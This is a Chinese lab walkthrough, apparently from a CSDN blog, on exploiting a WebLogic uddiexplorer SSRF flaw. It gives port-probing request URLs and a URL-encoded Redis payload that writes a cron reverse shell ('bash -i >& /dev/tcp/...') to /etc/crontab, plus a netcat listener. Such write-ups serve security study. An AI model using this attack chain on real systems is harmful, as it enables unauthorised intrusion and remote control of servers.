漏洞产生原因:
是指Web服务提供从用户指定的URL读取数据并展示功能又未
对用户输入的URL进行过滤,导致攻击者可借助服务端实现访问其本无权访问的URL。
攻击者无权访问的URL主要是内网,而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息,
所以SSRF的一大利用是探测内网端口开放信息。(所以SSRF归类为信息泄漏类型)
漏洞利用:
1.1、直接访问:http://ip:7001/uddiexplorer/ ,SSRF漏洞存在于:http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp
1.2、向服务器提交以下参数:
?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
1.3、当我们访问一个存在的端口时,比如:
http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001
会爆出如下错误:
1.4、当我们访问一个不存在的端口时,比如:
http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7000
会爆出如下错误:
我们可以根据返回的不同状态信息,来判断内网的IP是否存在以及对应端口是否开放,同时加以利用
因为这是个靶场所以我们已经知道该网站的内网,所以就省去了探测内网IP步骤。
内网IP:172.18.0.2:
手工一个个端口探测太麻烦,所以可以使用python脚本批量检测 内网端口,不太精通python可以百度
得到内网Redis服务端口号为:172.18.0.2:6379
访问内网返回如下:
1.5、打开kali,将反弹shell脚本写入/etc/crontab,crontab就是linux下的一个定时执行事件的一个程序,不懂的小伙伴可以自行谷歌:
set 1 "\n\n\n\n* * * * root bash -i >& /dev/tcp/xx.xx.xx.xx[这里是你自己的公网IP]/8888[这里是你监听的端口] 0>&1\n\n\n\n" config set dir /etc/config set dbfilename crontab save
1.6、kali端口监听:nc -lvnp 8888
1.7、打开Burip Suite修改请求包
因为我们是通过GET来发送命令的,因此要将上面的命令进行URL编码,同时我们还要制定一个要写入的文件,这里我就叫做test了,最终的URL如下:
?operator=http://172.21.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F8888%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
发送后返回结果如下:
1.8、回到kali会看到终端getshell
来源:CSDN
作者:Zane·S
链接:https://blog.csdn.net/qq_42477007/article/details/90544762